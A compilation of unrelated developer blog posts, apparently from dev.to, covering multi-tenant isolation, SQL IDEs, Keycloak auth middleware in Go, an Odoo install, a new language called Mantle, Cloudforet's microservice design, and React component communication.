- [Tenancy models for a multi-tenant app](https://dev.to/logto/tenancy-models-for-a-multi-tenant-app-3429)
When discussing multi-tenant applications, it's important to think about tenant isolation. This means keeping the data and resources of different tenants separate and secure within a shared system (for example, a cloud infrastructure or a multi-tenant application).
The goal of tenant isolation is to make sure that each tenant's data and operations remain distinct and secure from one another, even when they are using the same underlying resources.
In a Software as a Service (SaaS) scenario, tenant isolation involves creating structures within the SaaS framework that strictly regulate resource access. This prevents any unauthorized attempts to access another tenant's resources.
While the explanation might seem abstract, we'll use examples and key details to further explain the isolation mindset.
# Tenant isolation doesn't go against multi-tenancy's "shared" mindset
That is because tenant isolation is not necessarily an infrastructure resource-level construct. In the realm of multi-tenancy and isolation, some view isolation as a strict division between actual infrastructure resources. This usually leads to a model where each tenant has separate databases, computing instances, accounts, or private clouds. In shared resource scenarios, like multi-tenant apps, the way to achieve isolation can be a logical construct.
Tenant isolation focuses exclusively on using “tenant” context to limit access to resources. It evaluates the context of the current tenant and uses that context to determine which resources are accessible for that tenant. It applies this isolation to all users within that tenant. Any attempt to access a tenant resource should be scoped to just those resources that belong to that tenant.
# Isolation comes in different levels
When we understand that isolation isn't strictly tied to infrastructure resource levels and isn't a clear separation between physical infrastructure, it leads to a conclusion like this:
Instead of viewing isolation as a simple "yes" or "no," consider it as a spectrum. You can set up parts of your system to be more or less isolated based on what you need.
The diagram below illustrates this spectrum of isolation.

# Authentication and authorization are not equal to “isolation”
Using authentication and authorization to control access to your SaaS environments is important, but it's not enough for complete isolation. These mechanisms are just one part of the security puzzle.
People often ask: can I use general authorization solutions and role-based access control to achieve tenant isolation? You can build a multi-tenant app that way, but you can't say you have employed tenant isolation strategies as a best practice. We generally don't recommend it, because
> Tenant isolation is separate from authentication and authorization.
To illustrate, consider a situation where you've set up authentication and authorization for your SaaS system. When users log in, they receive a token containing information about their role, dictating what they can do in the application. This approach boosts security but doesn't ensure isolation.
Now, here's the catch: Without incorporating “tenant” context, such as a tenant ID, to restrict access to resources, relying solely on authentication and authorization won't prevent a user with the right role from accessing another tenant's resources.
This is where tenant isolation comes into play. It uses tenant-specific identifiers to establish boundaries, much like walls, doors, and locks, ensuring a clear separation between tenants.
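To make the distinction concrete, here is a minimal Python sketch (all names and data hypothetical): the role check is authorization, but only the `tenant_id` comparison provides isolation.

```python
# Hypothetical shared store: resources from two tenants live side by side.
RESOURCES = {
    "doc-1": {"tenant_id": "tenant-a", "body": "Q3 report"},
    "doc-2": {"tenant_id": "tenant-b", "body": "invoice"},
}

def get_resource(resource_id: str, *, tenant_id: str, role: str) -> dict:
    """Fetch a resource on behalf of a caller identified by (tenant_id, role)."""
    # Authorization: does this role allow reading at all?
    if role not in {"admin", "member"}:
        raise PermissionError("role may not read resources")
    resource = RESOURCES.get(resource_id)
    # Tenant isolation: scope every lookup by the caller's tenant context.
    # Without this comparison, an 'admin' of tenant-a could read tenant-b's
    # data. Returning the same error for "missing" and "wrong tenant" also
    # stops callers from probing for another tenant's resource IDs.
    if resource is None or resource["tenant_id"] != tenant_id:
        raise LookupError("resource not found")
    return resource
```

Even a fully privileged role cannot cross the boundary: `get_resource("doc-2", tenant_id="tenant-a", role="admin")` raises `LookupError`.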
# Identity in multi-tenancy apps
We discussed tenant isolation, but what about identities? How do you decide if your identities should be “isolated” or not?
There's often confusion around the concept of "identity isolation." In people's general understanding, it could refer to situations where one real-world user has two identities.
1. Both identities can exist within a single identity system. For instance, Sarah might have a personal email registered alongside a corporate email connected through single sign-on (SSO).
2. Users maintain two distinct identities within separate identity systems, representing entirely separate products. These products are completely unrelated to each other.
At times, these scenarios are referred to as "Identity isolated." Yet, this label might not assist in making a decision.
Rather than determining if you require "identity isolation," consider whether you or a segment of your business or product need to maintain separate identity systems. This answer can guide your Identity and Access Management (IAM) system design. For a brief response concerning a multi-tenant app,
> In most cases, in multi-tenant apps, identities are shared while each tenant's resources are isolated.
In multi-tenant applications, identities, unlike tenant-specific resources and data, are shared among multiple tenants. Picture yourself as the building administrator; you wouldn't want to maintain two separate name sheets to manage your tenants' identities.
When aiming for tenant isolation, you might have observed the recurring emphasis on the term "organization," often regarded as a best practice for building multi-tenant applications.
By employing the notion of "organization," you can achieve tenant isolation in your multi-tenant application while maintaining a unified identity system. This allows multiple "organizations" to coexist, independently, but share tenant-agnostic resources within the application. Similar to residents living in a building, each organization utilizes the application without concern for their neighbors, as the "organization" provides the necessary separation in the form of walls, hallways, doors, and locks. They share the overall building infrastructure, interior design system, and various tangible or intangible components.
# Introducing Logto's “Organization” feature
Logto's "Organization" feature is specifically crafted to meet the tenant isolation requirements necessary for building a SaaS product, aligning with industry standards and best practices.
In the future, we'll delve deeper into the "Organization" feature and how Logto facilitates the implementation of best practices for building a multi-tenant application. Stay tuned!
{% cta https://logto.io/?ref=dev %} Try Logto Cloud for free {% endcta %}
*Author: palomino*

---

# Top SQL IDEs in 2024

*Published 2024-06-06 on https://dev.to/concerate/top-sql-ides-in-2024-14bj*

In the ever-evolving world of data engineering, having the right tools at your disposal is crucial for success.
One essential tool for data professionals is a powerful and reliable SQL Integrated Development Environment (IDE).
An SQL IDE allows you to create, modify, and manage your databases, streamlining your workflow and increasing your overall efficiency.
To help you make an informed decision, we have compiled a list of the top SQL IDEs in 2024, taking into account their features, pros, and cons.
Whether you are a seasoned data engineer or just starting, this comprehensive guide will help you find the perfect SQL IDE to fit your needs.
**1. SQLynx**
**Pros:**
Intelligent code completion and suggestions: Using AI technology to provide advanced code completion, intelligent suggestions, and automatic error detection, significantly improving the efficiency of writing and debugging SQL queries.
Cross-platform and mobile access: Supporting access across multiple platforms (including Windows, macOS, Linux) to ensure users can efficiently manage databases from anywhere.
Robust security measures: Supporting both client and web-based management, providing enhanced encryption, multi-factor authentication, and strict access controls to protect sensitive data from unauthorized access and network threats.
**Cons:**
Learning curve: The product is relatively new and has web-based features, which may require some time to adapt and learn.
Security management: Introducing a significant amount of security measures such as authentication, authorization, logging, and auditing, which can increase complexity.
**2. Navicat**
**Pros:**
Multiple database support: Supports a variety of databases such as MySQL, PostgreSQL, SQLite, Oracle, MariaDB, providing strong adaptability.
User-friendly interface: Intuitive user interface design, easy to use for both beginners and professionals.
Data synchronization and backup: Offers powerful data synchronization, backup, and restore functions to ensure data safety and consistency.
**Cons:**
Cost: Navicat is a paid tool, which may be costly for individual users and small teams.
Performance requirements: Rich functionality may lead to higher system resource demands, especially when dealing with large databases.
Learning curve: Utilizing advanced features may require a certain learning and adaptation period.
**3. MySQL Workbench**
**Pros:**
Graphical User Interface (GUI): Provides an intuitive graphical interface, simplifying database design and management.
Database design: Supports database model design and reverse engineering, facilitating the management of complex database structures.
Query execution and debugging: Built-in query execution, debugging, and optimization features that help improve development efficiency.
**Cons:**
Performance issues: There may be performance bottlenecks when dealing with large databases.
Compatibility: Primarily focused on MySQL databases, with limited support for other databases.
**4. SQL Server Management Studio (SSMS)**
**Pros:**
Powerful features: Provides comprehensive database management, development, and debugging tools.
High integration: Closely integrated with Microsoft SQL Server, supporting a wide range of SQL Server functionalities.
Automation tasks: Supports SQL Agent for easy automation of management and maintenance tasks.
**Cons:**
Resource consumption: High system resource requirements, which may have a certain impact on performance.
Windows platform only: Limited to the Windows operating system, weak cross-platform support.
**5. pgAdmin**
**Pros:**
Open-source and free: Open-source software, free to use, with active community support.
Versatile: Comprehensive management support for PostgreSQL, including query execution, database design, and maintenance.
Cross-platform: Supports Windows, macOS, and Linux with good cross-platform compatibility.
**Cons:**
Performance issues: May encounter performance problems when dealing with very large databases.
User interface: The user interface is somewhat complex, requiring some learning time for new users.
**Conclusion:**
The choice of SQL tool depends on specific requirements, the type of database used, and budget constraints. Each tool has its unique pros and cons, and users should select the most suitable one based on their work environment and needs. SQLynx and Navicat, as modern SQL editors, are worth considering thanks to their powerful features and multi-platform support.

*Author: concerate*
---

# Bringing It All Together: Integrating GraphQL with Gin in Go

*Published 2024-06-06 on https://dev.to/mikeyglitz/bringing-it-all-together-integrating-graphql-with-gin-in-go-49b9 (tags: go, api, tutorial, webdev)*

In this phase of our journey, we delve into the realm of middleware integration with gin and the implementation of authentication middleware using gocloak. Building upon the groundwork laid in previous sections, we now unify our efforts by integrating middleware seamlessly into our GraphQL server. With gin, a powerful HTTP web framework for Go, we enhance our server's capabilities by incorporating middleware functions to preprocess requests. Leveraging gocloak, a Go module for interfacing with Keycloak, we secure our server with authentication middleware. This pivotal stage marks the convergence of all preceding elements, culminating in the creation of the server run function, which orchestrates the execution of our GraphQL API server. Let's explore how these components harmonize to elevate our server's functionality and security.
### Implementing Authentication Middleware with Keycloak and Gocloak
The final middleware we need to add to our server is authentication. In this example, we'll use [Keycloak](https://www.keycloak.org) as our identity provider. To interface with Keycloak in Go, we'll use the [gocloak](https://github.com/Nerzal/gocloak) module. By leveraging gocloak, we can perform authentication against Keycloak using Gin middleware.
To create the middleware, we begin by specifying the header that we want to inspect from the request. Keycloak leverages the OpenID Connect protocol, so we expect the `Authorization` header to begin with the word "Bearer," followed by a space, and then the full token string. Below, we define the constant `"Bearer "` for this purpose:
```go
const headerPrefix = "Bearer "
```
Next, we need to verify the token. To achieve this, we create a function that accepts a Gorm database pointer (`*gorm.DB`) and an HTTP request pointer (`*http.Request`). This function will extract the Authorization header from the request, validate the token using Keycloak, and return a user if a match is found in the database. If the calls do not complete successfully, the function will return an error.
```go
func ValidateToken(db *gorm.DB, req *http.Request) (*model.User, error) {
authToken := req.Header.Get("Authorization")
	authToken = strings.TrimPrefix(authToken, headerPrefix) // Strip the "Bearer " prefix from the token
keycloak := config.Config.Auth
// Make call to keycloak authenticating the token
client := gocloak.NewClient(keycloak.Endpoint)
// Add certificate verification if a certificate path is set
if len(keycloak.CertificatePath) > 0 {
log.Infof("Reading certificate from %s...", keycloak.CertificatePath)
cert, err := os.ReadFile(keycloak.CertificatePath)
if err != nil {
log.Errorf("[identity.cert] Unable to read certificate => %v", err)
return nil, err
}
certPool := x509.NewCertPool()
if ok := certPool.AppendCertsFromPEM(cert); !ok {
log.Errorf("[identity.cert] Unable to add cert to pool => %v", err)
return nil, err
}
restyClient := client.RestyClient()
restyClient.SetTLSClientConfig(&tls.Config{RootCAs: certPool})
log.Info("Imported certificate to keycloak client")
}
res, err := client.RetrospectToken(req.Context(), authToken, keycloak.ClientID, keycloak.ClientSecret, keycloak.RealmName)
if err != nil {
log.Errorf("unable to validate access token => %v", err)
return nil, err
}
log.Debugf("[auth] Access Token => %v", *res)
if !*res.Active {
err = errors.New("session is not active")
log.Errorf("session is not active => %v", err)
return nil, err
}
// fetch userinfo and query the database for the user
info, err := client.GetUserInfo(req.Context(), authToken, keycloak.RealmName)
if err != nil {
log.Errorf("unable to fetch user info => %v", err)
return nil, err
}
// add the user to the database if there is no current entry for the user
var user model.User
if err = db.FirstOrCreate(&user, model.User{
Username: *info.PreferredUsername,
Name: fmt.Sprintf("%s %s", *info.GivenName, *info.FamilyName),
}).Error; err != nil {
log.Errorf("unable to save user to database => %v", err)
return nil, err
}
log.Debug(user)
return &user, nil
}
```
The `AuthenticationMiddleware` function is designed to integrate authentication into a Gin web server. This function takes a Gorm database pointer (`*gorm.DB`) as an argument and returns a Gin handler function. Inside the handler, the middleware calls the `ValidateToken` function, passing it the database pointer and the current HTTP request. If the token validation fails, an error is logged, and the request is aborted with an HTTP status of 403 (Forbidden). If the token is successfully validated, the user information is added to the request context, allowing downstream handlers to access it. Finally, the middleware calls `c.Next()` to pass control to the next handler in the chain.
```go
func AuthenticationMiddleware(db *gorm.DB) gin.HandlerFunc {
return func(c *gin.Context) {
user, err := ValidateToken(db, c.Request)
if err != nil {
log.Errorf("unable to authenticate token => %v", err)
err = c.AbortWithError(http.StatusForbidden, err)
log.Debug(err)
return
}
c.Request = c.Request.WithContext(context.WithValue(c.Request.Context(), userKey, user))
c.Next()
}
}
```
Finally, the `ForUser` function is designed to retrieve the authenticated user from the request context within a Gin web server. This function takes a context (`ctx`) as an argument and attempts to extract the user information stored in the context using a predefined key (`userKey`). It utilizes the `ctx.Value` method to access the value associated with `userKey` and performs a type assertion to convert it to a `*model.User`. If the user information is not found or the type assertion fails, the function returns `nil`. This utility function allows other parts of the application to conveniently access the authenticated user from the context, facilitating user-specific operations and data handling.
```go
func ForUser(ctx context.Context) *model.User {
user, _ := ctx.Value(userKey).(*model.User)
return user
}
```
### Finalizing Server Setup: The Run Function
With all the middleware components established throughout the series, it's time to bring everything together and finalize the server setup. The `Run` function acts as the glue, orchestrating the integration of various middleware components and starting the Gin server. This function typically initializes the Gin router, applies the middleware layers in the desired order, and defines the routes or endpoints for handling incoming requests. It encapsulates the server configuration and provides a unified entry point for launching the web server. By consolidating the middleware setup and server initialization logic into a single function, we ensure consistency, maintainability, and ease of management for the entire server application.
The `Run` function sets up the server configuration, defines routes, applies middleware, and starts the server. It initializes the server with Gin's default middleware, sets up endpoints for actuator, GraphQL playground, and GraphQL itself. The middleware stack includes services, data loader middleware, and authentication middleware to handle various aspects of request processing and security. Finally, it starts the server to listen on the configured host and port, logging the endpoint for reference.
```go
func Run(db *gorm.DB) {
config := config.Config
endpoint := fmt.Sprintf("%s:%d", config.Service.Host, config.Service.Port)
r := gin.Default()
r.GET("/actuator/*endpoint", handlers.ActuatorHandler(db))
r.Use(middleware.Services(db, index.IndexConnection))
r.Use(middleware.DataloaderMiddleware())
r.GET(config.Service.PlaygroundPath, handlers.PlaygroundHandler())
r.Use(gin.Recovery())
secured := r.Group(config.Service.Path)
secured.Use(middleware.AuthenticationMiddleware(db))
secured.POST("/", handlers.GraphqlHandler())
log.Infof("Running @ http://%s", endpoint)
log.Fatal(r.Run(endpoint))
}
```
The `Run` function serves as the centerpiece of our server logic, orchestrating the integration of GraphQL with Gin in Go. Encapsulated within the `pkg/server` package, it represents the culmination of our efforts across various modules and middleware layers. At the bottom of our application entrypoint, housed in `cmd/main.go`, we invoke `server.Run` to kickstart the server and bring our GraphQL-powered application to life.
### Finishing Touches: Revisiting GraphQL
This `GraphqlHandler` function serves as the entry point for GraphQL requests in our server. It initializes a `config` struct with the resolver functions provided by our `graph` package. Additionally, it configures directives, such as validation, to be used during query execution. Finally, it creates a handler using `handler.NewDefaultServer`, passing in the executable schema generated by gqlgen based on our schema and resolvers. This handler is then returned as a Gin middleware function, allowing it to process GraphQL requests coming to our server.
```go
func GraphqlHandler() gin.HandlerFunc {
config := generated.Config{Resolvers: &graph.Resolver{}}
// Add directives
config.Directives.Validate = directives.Validate
h := handler.NewDefaultServer(generated.NewExecutableSchema(config))
return func(c *gin.Context) { h.ServeHTTP(c.Writer, c.Request) }
}
```
As we put the finishing touches on our GraphQL server, let's revisit one of our resolvers to demonstrate how we can seamlessly integrate middleware into our GraphQL operations. Middleware plays a crucial role in intercepting and augmenting requests before they reach our resolvers, allowing us to perform additional tasks such as authentication, logging, or data manipulation. By integrating middleware into our resolver functions, we can enhance the functionality and security of our GraphQL API without cluttering our resolver logic. Let's dive into the details of how middleware can be seamlessly incorporated into our GraphQL server architecture.
In this Go code snippet, we revisit the User resolver previously implemented in our GraphQL server. This resolver function, named Pantries, is responsible for fetching a list of pantries associated with a particular user. Within the function, we access the services layer through the context, leveraging a middleware function to retrieve the necessary service. Once obtained, we call the FetchPantriesByAuthor method from the PantryService to retrieve the pantries associated with the user. The function accepts optional parameters such as order, pagination details (startAt and size), and returns a PantryList along with any potential errors encountered during the process. This resolver exemplifies how middleware can seamlessly integrate with resolver functions to enhance the functionality of our GraphQL server.
```go
func (r *userResolver) Pantries(ctx context.Context, obj *model.User, order *model.SearchOrder, startAt *int, size *int) (*model.PantryList, error) {
services := middleware.ForServices(ctx)
return services.PantryService.FetchPantriesByAuthor(order, &obj.ID, startAt, size)
}
```
### Conclusion: Bringing it All Together
In conclusion, this article series has provided a comprehensive guide to building a robust GraphQL API server in Go. We began by setting up gqlgen for GraphQL integration, customized it to fit Go project conventions, and defined our GraphQL schema with resolvers. We abstracted our data model using services, integrated them using middleware, and implemented schema-level validation. Additionally, we optimized data retrieval with dataloaders, ensuring efficient query execution. Finally, we tied everything together with authentication middleware and a run function encapsulated in the server package. By following these steps, we've laid a solid foundation for creating powerful GraphQL APIs in Go, ready to handle various use cases and scale with ease.
# References
- Keycloak golang webservices - https://mikebolshakov.medium.com/keycloak-with-go-web-services-why-not-f806c0bc820a
- Opinionated graphql server with go - https://dev.to/cmelgarejo/creating-an-opinionated-graphql-server-with-go-part-1-3g3l
| mikeyglitz |
1,878,633 | Best Practice: Micro Service Architecture | Cloudforet, a series of LinuxFounation Open Source projects is one of the best practice for Micro... | 0 | 2024-06-06T02:04:43 | https://dev.to/choonho/best-practice-micro-service-architecture-1p3h | cloud, msa, development, kubernetes | > Cloudforet, a series of LinuxFounation Open Source projects is one of the best practice for Micro Service Architecture and Cloud Native.
# Micro Service Architecture
Cloudforet adopts a microservice architecture to provide a scalable and flexible platform. The microservice architecture is a design pattern that structures an application as a collection of loosely coupled services. Each service is self-contained and implements a single business capability. The services communicate with each other through well-defined APIs. This architecture allows each service to be developed, deployed, and scaled independently.

The frontend is a service provided for web users, featuring components such as console and console-api that communicate directly with the web browser. The core logic is structured as independent microservices and operates based on gRPC to ensure high-performance and reliable communication.
Each core service can be extended by plugin services. Every plugin is developed and deployed independently, and plugins can be added, removed, or upgraded without affecting the core logic.
# API-Driven design
API-Driven design in microservice architecture is a pattern where APIs (Application Programming Interfaces) are the primary way that services interact and communicate with each other. This approach emphasizes the design of robust, well-defined, and consistent APIs that serve as the contracts between microservices. Here’s a detailed explanation of the API-Driven design pattern:
### gRPC as the Communication Protocol
gRPC is a high-performance, open-source, universal RPC (Remote Procedure Call) framework that is widely used in microservice architectures. It uses HTTP/2 as the transport protocol and Protocol Buffers (protobuf) as the interface definition language. gRPC provides features such as bidirectional streaming, flow control, and authentication, making it an ideal choice for building efficient and reliable microservices.
### Loose Coupling
API-Driven design promotes loose coupling between microservices by defining clear and well-documented APIs. Each microservice exposes a set of APIs that define how other services can interact with it. This allows services to evolve independently without affecting each other, making it easier to develop, deploy, and maintain microservices.
### Version control
Cloudforet APIs support two types of versioning: core and plugin. The core version covers communication between the microservices and the frontend, while the plugin version covers the internal APIs that a single microservice uses to communicate with its plugins.
> API Documentation https://cloudforet.io/api-doc/
> Protobuf API Specification https://github.com/cloudforet-io/api
# Service-Resource-Verb Pattern
API-Driven design can be effectively explained using the concepts of service, resource, and verb. Here’s how these concepts apply to microservices:

### Service
A service in microservice architecture represents a specific business functionality. Each service is a standalone unit that encapsulates a distinct functionality, making it independently deployable, scalable, and maintainable. Services communicate with each other over a network, using lightweight protocols such as gRPC.
* Example: in Cloudforet, individual services include identity, repository, and inventory.
* identity service: manages user authentication and authorization.
* repository service: manages the metadata for plugins and their versions.
* inventory service: manages the resources and their states.
### Resource
A resource represents the entities or objects that the services manage. Resources are typically data entities that are created, read, updated, or deleted (CRUD operations) by the services.
* Example: in the identity Service, resources include Domain, User, and Workspace.
* Domain: represents a separate organization or customer.
* User: represents a user account.
* Workspace: represents a logically isolated group that contains resources.
### Verb
A verb represents the actions or operations that can be performed on resources. These are typically the gRPC methods (get, create, delete, update, list, etc.) in a service. Verbs define what kind of interaction is taking place with a resource.
* Example: in the User resource, verbs include create, get, update, delete, and list.
* create: creates a new user.
* get: retrieves the user information.
* update: updates the user information.
* delete: deletes the user.
* list: lists all users.
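To make the pattern concrete, here is a toy, in-memory sketch of an "identity" service exposing a "User" resource with its verbs. This is plain Python for illustration only; the real Cloudforet services are gRPC servers generated from the protobuf definitions, and the class and field names below are invented for the example.

```python
# Toy illustration of the service -> resource -> verb addressing pattern.
# Not Cloudforet code: real services are gRPC servers defined in protobuf.

class UserResource:
    """The 'User' resource inside a hypothetical 'identity' service."""
    def __init__(self):
        self._users = {}

    def create(self, user_id, name):      # verb: create
        self._users[user_id] = {"user_id": user_id, "name": name}
        return self._users[user_id]

    def get(self, user_id):               # verb: get
        return self._users[user_id]

    def update(self, user_id, **fields):  # verb: update
        self._users[user_id].update(fields)
        return self._users[user_id]

    def delete(self, user_id):            # verb: delete
        del self._users[user_id]

    def list(self):                       # verb: list
        return list(self._users.values())

# The "identity" service exposing its resources by name
identity = {"User": UserResource()}

# A call is addressed as service -> resource -> verb
user = identity["User"].create("u1", "alice")
print(user["name"])                   # alice
print(len(identity["User"].list()))   # 1
```

Because every API follows the same service/resource/verb shape, clients can discover and call any operation uniformly, which is exactly what the consistent naming buys you.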
# Reference
* Cloudforet https://cloudforet.io
* Cloudforet github https://github.com/cloudforet-io
| choonho |
1,878,634 | Kneader Compounding Machines: Meeting the Challenges of Polymer Mixing | Kneader Compounding Devices: The Risk-free as well as Effective Method towards Blend... | 0 | 2024-06-06T02:02:16 | https://dev.to/ronald_woodgo_ba03f686524/kneader-compounding-machines-meeting-the-challenges-of-polymer-mixing-364c | design, product |
Kneader Compounding Machines: A Safe and Efficient Way to Mix Polymers
Kneader compounding machines are essential equipment in the world of plastics manufacturing. They are used to blend different polymers together to produce new and improved compounded materials, and they serve a wide range of purposes, from helping to create new toys, to improving the quality of automotive parts, to producing new kinds of packaging materials.
Benefits of Kneader Compounding Machines
Kneader compounding machines have many advantages over traditional mixing methods. They are faster and more efficient than other mixers, and they are also safer to use. They have a large capacity and can handle large volumes of material with ease, including materials of different viscosities, which matters when developing new compounds. Another advantage is that they can mix materials at a precise temperature: the temperature stays consistent throughout the entire mixing process, which is essential for producing high-quality materials.
Innovation in Kneader Compounding Machines
Kneader compounding machines have improved significantly over the years and are now designed for greater efficiency, safety, and ease of use. One innovation is the integration of advanced sensors and controls that can monitor and adjust the mixing process in real time. These sensors detect changes in temperature, pressure, and viscosity and adjust the process accordingly, ensuring that mixing is consistent and the end product is of the highest quality.
Safety Considerations for Kneader Compounding Machines
Kneader compounding machines are very safe to use thanks to their many safety features. Safety guards protect the operator from moving parts during operation, and emergency stop buttons can halt the machine instantly in case of an emergency. In addition, alarms and warning lights alert the operator to any potential problems during operation.
Using Kneader Compounding Machines
Kneader compounding machines are very easy to use. The operator simply adds the polymers to be mixed, sets the temperature, and starts the machine; the machine takes care of the rest. The operator can adjust the mixing process if needed by changing the temperature, mixing speed, or mixing time. Once mixing is complete, the mixed material is removed from the machine for further processing.
Quality of Kneader Compounding Machines
Kneader compounding machines are high-quality machines built to last. They are made from durable materials designed to withstand heavy use, and they are easy to maintain, with simple cleaning procedures that take only a few minutes. They are also backed by customer support, so any issues that arise can be resolved quickly by a knowledgeable team.
Applications of Kneader Compounding Machines
Kneader compounding machines have a wide range of applications in the manufacturing industry. They are commonly used in the production of plastics, rubber, adhesives, and other materials; typical applications include automotive parts, toys, food packaging materials, and medical supplies. They are also used in the research and development of new materials, since they can blend different polymers together to create new and interesting compounds.
| ronald_woodgo_ba03f686524 |
1,878,596 | So I tried Odoo for the first time | From web developer's viewpoint, I'm going to setup Odoo for the first time. It is going to installed... | 0 | 2024-06-06T01:57:53 | https://dev.to/yuiltripathee/so-i-tried-odoo-for-the-first-time-2o96 | webdev, erp, beginners, odoo | From a web developer's viewpoint, I'm going to set up Odoo for the first time. It will be installed on my local computer (Ubuntu 22.04) from the Community Edition source.
## Prerequisites
- Git, Python (3.10+), Pip and basics (IDEs and stuff)
- PostgreSQL database (can be community edition)
## Initial steps
This is coming from Odoo's official documentation.
1. Fork the GitHub [repo](https://github.com/odoo/odoo) for the community edition.
2. Create a new PostgreSQL user; Odoo does not allow connecting as the default `postgres` user.
```sh
sudo -u postgres createuser -d -R -S $USER
createdb $USER
```
## Running Odoo for the first time
After you clone the Odoo repo and `cd` inside, run the command below. Two databases end up in PostgreSQL: `$USER` (whatever your username is, created above) and `mydb`, which Odoo creates on first run.
```sh
python3 odoo-bin --addons-path=addons -d mydb
```
After the server has started (once the INFO log `odoo.modules.loading: Modules loaded.` is printed), open [http://localhost:8069](http://localhost:8069) in a web browser and log into the Odoo database with the base administrator account: use `admin` as the email and, again, `admin` as the password.
## Check the database schema
I ran the ERD for database tool in pgAdmin to inspect the database design for the Odoo community base platform.
From the start there are 114 tables linked in a mesh. So, I chose to dig into the database structure a bit further.
## Findings
1. Odoo's database model is quite mature as of version 17 and adaptable to a wide range of business contexts.
2. The database structure is monolithic. Decoupling it into microservices could therefore be a good prospect, as some modules require different scaling than others.
3. You can refer to [Server Framework 101 guide](https://www.odoo.com/documentation/17.0/developer/tutorials/server_framework_101.html) in order to develop your own modules.
## References
- [Odoo on-premise setup from source guide](https://www.odoo.com/documentation/17.0/administration/on_premise/source.html) | yuiltripathee |
1,877,536 | Buffing A 50 Year Old Programming Language | Hello, everyone! Today, I'm excited to take you on a journey through the fascinating world of... | 0 | 2024-06-06T01:57:11 | https://dev.to/mantlecore/buffing-a-50-year-old-programming-language-58la | showdev, opensource, programming, cpp | Hello, everyone! Today, I'm excited to take you on a journey through the fascinating world of programming languages and compilers. We'll be exploring a new language I'm developing called "Mantle" (or simply "M"). But before we get into the nitty-gritty, let's discuss the architecture of Mantle and what I aim to achieve with it.
## The Inspiration Behind Mantle
I've been immersed in programming with C and C++ for a considerable time, primarily working on 3D computer graphics using Vulkan. My initial exploration into programming began with C++, which I grew to love for its high-level constructs and powerful memory management capabilities. However, I often found C++ to be overly complex. I gradually developed a preference for C. C's simplicity, with its minimal abstraction over assembly, provided a clearer understanding of how the hardware operates.
Yet, I frequently found myself torn between C and C++ when starting new projects. Each language has its strengths and weaknesses, and I wanted to create one that blends the best aspects of both. Thus, Mantle was born.
## The Design Philosophy of Mantle
Today I will just briefly show you an overview of what I think Mantle can look like.
### Organizing Code: Namespaces
One of the challenges in C is the lack of a robust mechanism for code organization, leading to messy codebases. Mantle addresses this by incorporating namespaces from C++, allowing for better code grouping and organization.

### Defining Interfaces: Protocols
Mantle introduces the concept of “protocols". Protocols define requirements, such as functions and variables, that must be implemented by adopting types. This brings us to the “prototype” keyword, which acts as a placeholder for types specified when the protocol is adopted. This design encourages composition over inheritance, promoting flexible and modular code.

### Creating Classes: Blueprints
In Mantle, “blueprints” are akin to classes in other languages. Blueprints support public and private members, constructors, and destructors for managing resources. Unlike C++, Mantle distinguishes between structs and blueprints. Structs are used for grouping related variables, while blueprints facilitate object-oriented programming.

### Extending Functionality: Extensions
To extend a blueprint's functionality for specific parts of the code, Mantle uses the “extension” keyword. This allows functions to be associated with a blueprint only within a particular file, providing modular and context-specific extensions.


### Eliminating Redundancy: Generics
Generics are a powerful feature in Mantle, enabling the definition of functions, blueprints, structs, and variables with types specified later. This reduces code repetition and enhances flexibility.

### Powerful Preprocessing: Macros
In Mantle, macros are defined with the “macro” keyword, leveraging generics for powerful code inclusion before compilation. This concept builds on the preprocessor directives of C and C++.

### Core Concepts: Pointers and Optionals
Mantle incorporates pointers and optionals as core language features. If you have ever programmed in Swift or used `std::optional<T>` in C++, you might be quite familiar with this. Optionals represent values that may or may not be present, providing a type-safe way to handle absent values. Pointers, on the other hand, store memory addresses, enabling direct memory manipulation.
## Building Mantle: The Lexical Analyzer
With an understanding of Mantle's design, let's dive into building the language, starting with Lexical Analysis, or lexing. Lexing transforms raw source code into tokens, which are the fundamental syntax elements.
### Defining Token Types
We'll begin by defining the types of tokens Mantle will recognize:
- **Keywords:** Data types, control flow constructs, data structures, and reserved words.
- **Operators:** Arithmetic, relational, pointer, bitwise, and assignment operators.
- **Punctuators:** Parentheses, curly brackets, square brackets, commas, etc.
- **Identifiers:** Names given to variables, functions, and types.
- **End of File:** Marks the end of the source file.
These tokens will evolve as the language matures and its functionality is refined.
### The Lexing Process
Next, we'll write a lexer that processes a file, identifies tokens, and stores information for error handling, such as the token's position in the source file. Once identified, tokens are categorized and queued for further processing.

### Testing the Lexer
To test our lexer, we'll hardcode a function that processes tokens and generates assembly code. For example, writing a "return" statement followed by a value, passing this file through our lexer, and generating assembly code will validate our lexer's functionality.

Here are some more extreme tests.


## Conclusion
We've successfully laid the groundwork for Mantle and developed a basic lexer. There's much more to explore and build, but I hope you've enjoyed this initial exploration into the process. If you found this interesting, feel free to connect with me and to share any suggestions.
You can find the project on my [github](https://github.com/Mantle-Core/Mantle-Language). I also made a [discord server](https://discord.gg/7TEkMmvn).
If you have some feedback or suggestions, let me know in the comments! Thanks for joining me on this journey, and I'll see you next time!
| mantlecore |
1,878,630 | Inter component communication in React. | In the React ecosystem, building complex applications often involves breaking down the UI into... | 0 | 2024-06-06T01:49:32 | https://dev.to/engineeringexpert/inter-component-communication-in-react-300b | react, javascript, frontend |
In the React ecosystem, building complex applications often involves breaking down the UI into reusable components. However, this modularity raises a crucial question: How do these components effectively communicate and share data?
This article explores the various mechanisms available in React to ensure smooth and efficient communication between your components.
**Understanding the Need for Communication**
Before diving into the techniques, let's clarify why inter-component communication is essential:
- **Data Sharing:** Components often need to access and modify data that exists outside their local state.
- **Event Handling:** User interactions (clicks, form submissions, etc.) might trigger changes that need to be communicated to other components.
- **State Management:** In larger applications, centralized state management can simplify complex data flows.
Passing data from child to parent with a callback prop:

```javascript
function Parent() {
  const handleChildClick = (data) => {
    // Do something with data
  };

  return <Child onClick={handleChildClick} />;
}

function Child({ onClick }) {
  return <button onClick={() => onClick("Data from child")}>Click me</button>;
}
```
Passing data from parent to child via props:

```javascript
// Parent component
function Parent() {
  const message = "Hello from parent!";

  return <Child message={message} />;
}

// Child component
function Child({ message }) {
  return <p>{message}</p>;
}
```
References: https://www.frontendeng.dev/blog/5-tutorial-how-to-communicate-between-two-components-in-react | engineeringexpert |
